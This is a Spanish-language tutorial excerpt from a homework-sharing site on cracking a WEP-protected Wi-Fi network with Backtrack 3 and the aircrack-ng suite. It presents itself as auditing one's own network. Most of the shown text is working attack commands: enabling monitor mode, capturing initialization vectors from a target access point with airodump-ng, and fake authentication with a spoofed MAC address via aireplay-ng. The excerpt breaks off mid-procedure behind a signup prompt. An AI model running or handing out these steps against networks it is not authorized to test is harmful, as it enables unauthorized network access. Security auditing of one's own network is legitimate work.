Tecnologo

Páginas: 5 (1204 palabras) Publicado: 13 de marzo de 2013
Como auditar la seguridad de tu red inalambrica

Este tutorial sirve para auditar la seguridad de tu red con claves WEP.

Elementos: - Descargar el CD Live de Backtrack 3 http://www.remote-exploit.org/backtrack_download.html o instala los paquetes para tu distrobucion de linux. en debian unicamente si requiere del paquete "aircrack-ng". - Estas indicaciones son para la tarjeta de red esternaPCMCIA Airlink con el chip Atheros. tambien funcionan los realtech - Estar lo mas cerca posible del emisor de señal.

Pasos:

Iniciar el Bactrack 3 en Live Cd

En el caso que utilizas Backtrack, reinicias tu computadora con el disco de backtrack 3 adentro

Habilitar el modo monitor

Abrir una consola y escribir los siguientes comando para habilitar tu tarjeta en modo monitor

airmon-ngstop ath0
así paramos el interfaz de monitoreo. es un precación que puede ser inecesario. asumimos que el interfaz de monitoreo es ath0.

airmon-ng start wifi0
cambia wifi0 para el interfaz de tu tarjeta. este orden nos dará algo como el siguiente:

wifi0 Realtek 8187L rtl8187 - [phy2]
(monitor mode enabled on ath0)
cambiará segun tu tarjeta y manejador. el ultimo frase,entre parethesis nos da el nombre del disponitivo de monitoreo que utilizamos en el resto del tutorial.

Detectar redes tráfico

El siguiente paso es detectar tus redes y el trafico

airodump-ng ath0
Debe de salir la dirección de un AP (BSSID), el canal (CH) el tipo de cifración (ENC)((WEP, WPA o, si es abierto, OPN)) y el nombre de la red (ESSID) como puedes ver:

CH 11 ][ Elapsed: 35mins ][ 2009-01-15 18:14

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1D:68:F7:2F:40 23 2105 17 0 1 54 WEP WEP INFINITUMXYZ
00:40:96:42:6F:D9 18 2103 1778 0 11 11 WEP WEP mi_red
00:0D:72:79:29:C1 12 1035 393 0 6 22. WEP WEPSUPREMO
00:14:95:70:5A:A1 7 868 0 0 6 54. OPN 2WIRE548
Una vez encontrada la red cancelas la orden con ctrl-C. corremos de nuevo airodump-ng pero ahora epscificando el canal, nombre del AP (punto de acesso) y nombre del archivo en lo cual guardar los vectores de initialización (IVs).

airodump-ng -w [nombredearchivo] -c [número de canal]-i -d [BSSID] ath0
tomando el ejemplo de "2WIRE548" seria asi:

airodump-ng -w 2WIRE548 -c 6 -i -d 00:14:95:70:5A:A1 ath0
A continuación saldra el trafico de tu red y los paquetes detectados al archivo que especificamos con el opcion "-w": "22WIRE548.ivs". los otros opciones son -c,el numero de canal, -i, unicamente captura IVs y -d, limitamos el escaneo al BSSID especificado.

dejaremosairodump-ng en su proprio ventana, y abrimos otro terminal para seguir con aireplay-ng.

Aireplay

Vamos a authenticarnos con nuestra AP y luego empezar de enviar peticiones ARP. esto incrementara el numero de IVs que capturamos con airodump-ng.

Para la authenicacion, abres otra consola y escibes el siguiente comando ((no es siempre necesario esto paso, entonces si recibimos "Associationdenied" de todas maneras intentamos con el comando de aireplay-ng que sigue))

aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [dirección MAC] ath0
el "ESSID" y "BSSID" obtenemos del airodump-ng. el "dirección MAC" es lo mismo que el punto 3, esconde el direccion fisica de nuestra tarjeta. así que puedemos poner lo que queremos. si no tienes idea, copia y pega el siguiente en su lugar:00:11:22:33:44:55
Si todo va bien veremos algo así: Sending Authentication Request (Open System) [ACK] Authentication successful Sending Association Request [ACK] Association successful (AID: 1)

vemos que la programa cambia el MAC de nuestra tarjeta: The interface MAC (xx:xx:xx:xx:xx) doesn't match the specified MAC (-h). ifconfig ath0 hw ether 00:11:22:33:44:55

Si ves el siguiente es porque tu...
Leer documento completo

Regístrate para leer el documento completo.

Estos documentos también te pueden resultar útiles

  • Tecnologico
  • Tecnologo
  • Tecnologo
  • tecnologa
  • tecnologicos
  • tecnologo
  • Tecnologa
  • tecnologo

Conviértase en miembro formal de Buenas Tareas

INSCRÍBETE - ES GRATIS